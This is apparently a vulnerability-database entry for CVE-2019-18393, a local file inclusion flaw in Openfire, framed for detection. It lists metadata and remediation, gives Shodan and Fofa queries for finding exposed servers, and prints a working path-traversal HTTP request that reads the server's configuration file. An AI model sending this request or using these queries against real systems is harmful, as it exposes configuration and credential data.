🔙 목록으로 돌아가기

CVE-2019-18393: Ignite Realtime Openfire <4.42 - Local File Inclusion

TitleIgnite Realtime Openfire <4.42 - Local File Inclusion
Authorpikpikcu
SeverityMedium
ImpactSuccessful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, and potential compromise of the affected system.
RemediationUpgrade Ignite Realtime Openfire to version 4.42 or later to mitigate this vulnerability.
CVSS Score5.3
EPSS Score0.82521
CVE IDCVE-2019-18393
CWE IDCWE-22
Shodan Queryhttp.title:"openfire admin console"http.title:"openfire"
Fofa Querytitle="openfire"title="openfire admin console"
Tags cve cve2019 openfire lfi igniterealtime vkev vuln

🔍 Vulnerability Description

Ignite Realtime Openfire through 4.4.2 is vulnerable to local file inclusion via PluginServlet.java. It does not ensure that retrieved files are located under the Openfire home directory.

🌐 HTTP Request

GET /plugins/search/..%5C..%5C..%5Cconf%5Copenfire.xml HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-18393.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-18393.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A